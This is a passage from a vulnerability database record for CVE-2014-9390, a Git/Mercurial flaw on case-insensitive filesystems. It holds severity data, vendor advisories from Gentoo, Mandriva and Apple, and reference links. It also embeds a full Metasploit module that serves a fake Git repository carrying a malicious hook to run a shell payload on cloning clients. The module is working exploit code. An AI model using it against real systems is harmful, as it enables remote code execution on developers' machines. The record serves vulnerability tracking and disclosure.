impactScore: null, integrityImpact: "High", privilegesRequired: "None", scope: "Unchanged", trust: 0.8, userInteraction: "None", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2014-9390", trust: 1, value: "CRITICAL", }, { author: "NVD", id: "JVNDB-2014-008933", trust: 0.8, value: "Critical", }, { author: "CNNVD", id: "CNNVD-201412-509", trust: 0.6, value: "CRITICAL", }, { author: "VULHUB", id: "VHN-77335", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2014-9390", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. \nSuccessful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data. \n\nBackground\n==========\n\nGit is a free and open source distributed version control system\ndesigned to handle everything from small to very large projects with\nspeed and efficiency. ##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass Metasploit4 < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',\n 'Description' => %q(\n This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities. \n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository. \n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported. \n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work. \n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-9390'],\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],\n ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],\n ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],\n ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],\n ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],\n ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']\n\n ],\n 'DisclosureDate' => 'Dec 18 2014',\n 'Targets' =>\n [\n [\n 'Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic bash-tcp perl bash'\n }\n }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Platform' => [ 'windows' ],\n 'Arch' => [ARCH_X86, ARCH_X86_64]\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('GIT', [true, 'Exploit Git clients', true])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),\n OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),\n OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),\n OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])\n ]\n )\n end\n\n def setup\n # the exploit requires that we act enough like a real Mercurial HTTP instance,\n # so we keep a mapping of all of the files and the corresponding data we'll\n # send back along with a trigger file that signifies that the git/mercurial\n # client has fetched the malicious content. \n @repo_data = {\n git: { files: {}, trigger: nil },\n mercurial: { files: {}, trigger: nil }\n }\n\n unless datastore['GIT'] || datastore['MERCURIAL']\n fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')\n end\n\n setup_git\n setup_mercurial\n\n super\n end\n\n def setup_git\n return unless datastore['GIT']\n # URI must start with a /\n unless git_uri && git_uri =~ /^\\//\n fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')\n end\n # sanity check the malicious hook:\n if datastore['GIT_HOOK'].blank?\n fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank')\n end\n\n # In .git/hooks/ directory, specially named files are shell scripts that\n # are executed when particular events occur. For example, if\n # .git/hooks/post-checkout was an executable shell script, a git client\n # would execute that file every time anything is checked out. There are\n # various other files that can be used to achieve similar goals but related\n # to committing, updating, etc. \n #\n # This builds a fake git repository using the knowledge from:\n #\n # http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n # http://schacon.github.io/gitbook/7_browsing_git_objects.html\n case target.name\n when 'Automatic'\n full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n when 'Windows Powershell'\n psh = cmd_psh_payload(payload.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n encode_final_payload: true)\n full_cmd = \"#!/bin/sh\\n#{psh}\"\n end\n\n sha1, content = build_object('blob', full_cmd)\n trigger = \"/objects/#{get_path(sha1)}\"\n @repo_data[:git][:trigger] = trigger\n @repo_data[:git][:files][trigger] = content\n # build tree that points to the blob\n sha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the hooks directory in which the hook lives, called hooks\n sha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the partially uppercased .git directory in\n # which hooks live\n variants = []\n %w(g G). each do |g|\n %w(i I).each do |i|\n %w(t T).each do |t|\n git = g + i + t\n variants << git unless git.chars.none? { |c| c == c.upcase }\n end\n end\n end\n git_dir = '.' + variants.sample\n sha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build the supposed commit that dropped this file, which has a random user/company\n email = Rex::Text.rand_mail_address\n first, last, company = email.scan(/([^\\.]+)\\.([^\\.]+)@(.*)$/).flatten\n full_name = \"#{first.capitalize} #{last.capitalize}\"\n tstamp = Time.now.to_i\n author_time = rand(tstamp)\n commit_time = rand(author_time)\n tz_off = rand(10)\n commit = \"author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\\n\" \\\n \"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\\n\" \\\n \"\\n\" \\\n \"Initial commit to open git repository for #{company}!\\n\"\n if datastore['VERBOSE']\n vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\")\n commit.each_line { |l| vprint_status(l.strip) }\n end\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{commit}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build HEAD\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n # lastly, build refs\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def setup_mercurial\n return unless datastore['MERCURIAL']\n # URI must start with a /\n unless mercurial_uri && mercurial_uri =~ /^\\//\n fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /')\n end\n # sanity check the malicious hook\n if datastore['MERCURIAL_HOOK'].blank?\n fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')\n end\n # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n # also as simple as possible so that we don't have to support all of the protocol\n # complexities. Taken from:\n # http://mercurial.selenic.com/wiki/HttpCommandProtocol\n # http://selenic.com/hg/file/tip/mercurial/wireproto.py\n @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'\n fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'\n @repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\"\n # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n @repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n # TODO: finish building the fake repository\n end\n\n # Build's a Git object\n def build_object(type, content)\n # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n header = \"#{type} #{content.size}\\0\"\n store = header + content\n [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]\n end\n\n # Returns the Git object path name that a file with the provided SHA1 will reside in\n def get_path(sha1)\n sha1[0...2] + '/' + sha1[2..40]\n end\n\n def exploit\n super\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n if datastore['GIT']\n hardcoded_uripath(git_uri)\n print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n end\n if datastore['MERCURIAL']\n hardcoded_uripath(mercurial_uri)\n print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n end\n end\n\n # handles routing any request to the mock git, mercurial or simple HTML as necessary\n def on_request_uri(cli, req)\n # if the URI is one of our repositories and the user-agent is that of git/mercurial\n # send back the appropriate data, otherwise just show the HTML version\n if (user_agent = req.headers['User-Agent'])\n if datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri)\n do_git(cli, req)\n return\n elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri)\n do_mercurial(cli, req)\n return\n end\n end\n\n do_html(cli, req)\n end\n\n # simulates a Git HTTP server\n def do_git(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, @repo_data[:git][:files][req_file])\n if req_file == @repo_data[:git][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # simulates an HTTP server with simple HTML content that lists the fake\n # repositories available for cloning\n def do_html(cli, _req)\n resp = create_response\n resp.body = <<HTML\n <html>\n <head><title>Public Repositories</title></head>\n <body>\n <p>Here are our public repositories:</p>\n <ul>\nHTML\n\n if datastore['GIT']\n this_git_uri = URI.parse(get_uri).merge(git_uri)\n resp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\"\n else\n resp.body << \"<li><a>Git</a> (currently offline)</li>\"\n end\n\n if datastore['MERCURIAL']\n this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n resp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\"\n else\n resp.body << \"<li><a>Mercurial</a> (currently offline)</li>\"\n end\n resp.body << <<HTML\n </ul>\n </body>\n </html>\nHTML\n\n cli.send_response(resp)\n end\n\n # simulates a Mercurial HTTP server\n def do_mercurial(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n uri = URI.parse(req.uri)\n req_path = uri.path\n req_path += \"?#{uri.query}\" if uri.query\n req_path.gsub!(/^#{mercurial_uri}/, '')\n if @repo_data[:mercurial][:files].key?(req_path)\n vprint_status(\"Sending Mercurial #{req_path}\")\n send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')\n if req_path == @repo_data[:mercurial][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Mercurial #{req_path} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\n\n # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n def mercurial_uri\n return @mercurial_uri if @mercurial_uri\n if datastore['MERCURIAL_URI'].blank?\n @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n else\n @mercurial_uri = datastore['MERCURIAL_URI']\n end\n end\nend\n. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-19\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Mercurial: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #533008, #544332, #578546, #582238\n ID: 201612-19\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Mercurial, the worst of\nwhich could lead to the remote execution of arbitrary code. \n\nBackground\n==========\n\nMercurial is a distributed source control management system. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-vcs/mercurial < 3.8.4 >= 3.8.4\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Mercurial. Please\nreview the CVE identifier and bug reports referenced for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code with the\nprivileges of the process. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll mercurial users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/mercurial-3.8.4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9390\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390\n[ 2 ] CVE-2014-9462\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462\n[ 3 ] CVE-2016-3068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068\n[ 4 ] CVE-2016-3069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069\n[ 5 ] CVE-2016-3105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105\n[ 6 ] CVE-2016-3630\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-19\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users' machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2015:169\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : git\n Date : March 30, 2015\n Affected: Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Updated git packages fix security vulnerability:\n \n It was reported that git, when used as a client on a case-insensitive\n filesystem, could allow the overwrite of the .git/config file when\n the client performed a git pull. Because git permitted committing\n .Git/config (or any case variation), on the pull this would replace the\n user's .git/config. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390\n http://advisories.mageia.org/MGASA-2014-0546.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm\n efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm\n c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm\n 10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm\n dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm\n 879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm\n 1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm\n 8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm\n 2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm\n 39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm\n 35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm\n d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm\n 644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm \n 261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX\nAknCsk/2slzIzxNpACLxeDI=\n=Vdej\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2015-03-09-4 Xcode 6.2\n\nXcode 6.2 is now available and addresses the following:\n\nsubversion\nAvailable for: OS X Mavericks v10.9.4 or later\nImpact: Multiple vulnerabilities in Apache Subversion\nDescription: Multiple vulnerabilities existed in Apache Subversion,\nthe most serious of which may have allowed an attacker with a\nprivileged position to spoof SSL servers via a crafted certificate. \nThese issues were addressed by updating Apache Subversion to version\n1.7.19. This issue was\naddressed by adding additional checks. \nCVE-ID\nCVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of\nMercurial\n\nXcode 6.2 may be obtained from:\nhttps://developer.apple.com/xcode/downloads/\n\nTo check that the Xcode has been updated:\n\n* Select Xcode in the menu bar\n* Select About Xcode\n* The version after applying this update will be \"6.2\"", sources: [ { db: "NVD", id: "CVE-2014-9390", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "BID", id: "71732", }, { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, ], trust: 2.61, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://www.scap.org.cn/vuln/vhn-77335", trust: 0.1, type: "unknown", }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2014-9390", trust: 3.5, }, { db: "SECTRACK", id: "1031404", trust: 1.7, }, { db: "JVNDB", id: "JVNDB-2014-008933", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201412-509", trust: 0.7, }, { db: "BID", id: "71732", trust: 0.4, }, { db: "PACKETSTORM", id: "131193", trust: 0.2, }, { db: "PACKETSTORM", id: "129784", trust: 0.2, }, { db: "PACKETSTORM", id: "129677", trust: 0.2, }, { db: "PACKETSTORM", id: "133704", trust: 0.2, }, { db: "PACKETSTORM", id: "140059", trust: 0.2, }, { db: "PACKETSTORM", id: "129939", trust: 0.1, }, { db: "VULHUB", id: "VHN-77335", trust: 0.1, }, { db: "VULMON", id: "CVE-2014-9390", trust: 0.1, }, { db: "PACKETSTORM", id: "130744", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, id: "VAR-202002-0749", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-77335", }, ], trust: 0.01, }, last_update_date: "2024-11-29T20:47:08.213000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "HT204147", trust: 0.8, url: "https://support.apple.com/en-us/HT204147", }, { title: "HT204147", trust: 0.8, url: "https://support.apple.com/ja-jp/HT204147", }, { title: "EGit", trust: 0.8, url: "https://www.eclipse.org/egit/", }, { title: "JGit", trust: 0.8, url: "https://www.eclipse.org/jgit/", }, { title: "Git 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1 and thanking friends in Mercurial land", trust: 0.8, url: "https://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { title: "Top Page", trust: 0.8, url: "https://libgit2.org/", }, { title: "Release Notes", trust: 0.8, url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { title: "Git Security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108063", }, { title: "Debian CVElist Bug Report Logs: CVE-2014-9390: Errors in handling case-sensitive directories allow for remote code execution on pull", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=3d261960ef416477512c63345482cde6", }, { title: "Ubuntu Security Notice: git vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-2470-1", }, { title: "Debian Security Advisories: DSA-3257-1 mercurial -- security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories&qid=ff84582761ae814b21d648e3e5695a92", }, { title: "Debian CVElist Bug Report Logs: dulwich: CVE-2015-0838: buffer overflow in C implementation of pack apply_delta()", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=924c567b0c5bfcb8fd430e33e12ece5c", }, { title: "Debian CVElist Bug Report Logs: mercurial: CVE-2014-9462: command injection via sshpeer._validaterepo()", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=a8fb7f02161f50bfff0ab70ff4eee61e", }, { title: "Debian CVElist Bug Report Logs: dulwich: CVE-2014-9706: does not prevent to write files in commits with invalid paths to working tree", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=d965cc1cf23195b4ff589e7cb23233d5", }, { title: "Apple: Xcode 6.2", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories&qid=28f88d65a83ee45368f37221b1b4ea8f", }, { title: "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins&qid=2a43c5799a7dd07d6c0a92a3b040d12f", }, { title: "git_osx_installer", trust: 0.1, url: "https://github.com/timcharper/git_osx_installer ", }, { title: "CVE-2014-9390", trust: 0.1, url: "https://github.com/mmetince/CVE-2014-9390 ", }, ], sources: [ { db: "VULMON", id: "CVE-2014-9390", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1.9, }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.6, url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { trust: 2.6, url: "https://news.ycombinator.com/item?id=8769667", }, { trust: 1.8, url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { trust: 1.8, url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { trust: 1.8, url: "http://mercurial.selenic.com/wiki/whatsnew", }, { trust: 1.8, url: "http://securitytracker.com/id?1031404", }, { trust: 1.8, url: "http://support.apple.com/kb/ht204147", }, { trust: 1.8, url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { trust: 1.8, url: "https://libgit2.org/security/", }, { trust: 1.4, url: "https://nvd.nist.gov/vuln/detail/cve-2014-9390", }, { trust: 0.9, url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9390", }, { trust: 0.3, url: "http://git.or.cz/", }, { trust: 0.2, url: "https://www.apple.com/support/security/pgp/", }, { trust: 0.2, url: "https://developer.apple.com/xcode/downloads/", }, { trust: 0.2, url: "https://support.apple.com/kb/ht1222", }, { trust: 0.2, url: "http://gpgtools.org", }, { trust: 0.2, url: "http://creativecommons.org/licenses/by-sa/2.5", }, { trust: 0.2, url: "https://security.gentoo.org/", }, { trust: 0.2, url: "https://bugs.gentoo.org.", }, { trust: 0.2, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9390", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/20.html", }, { trust: 0.1, url: 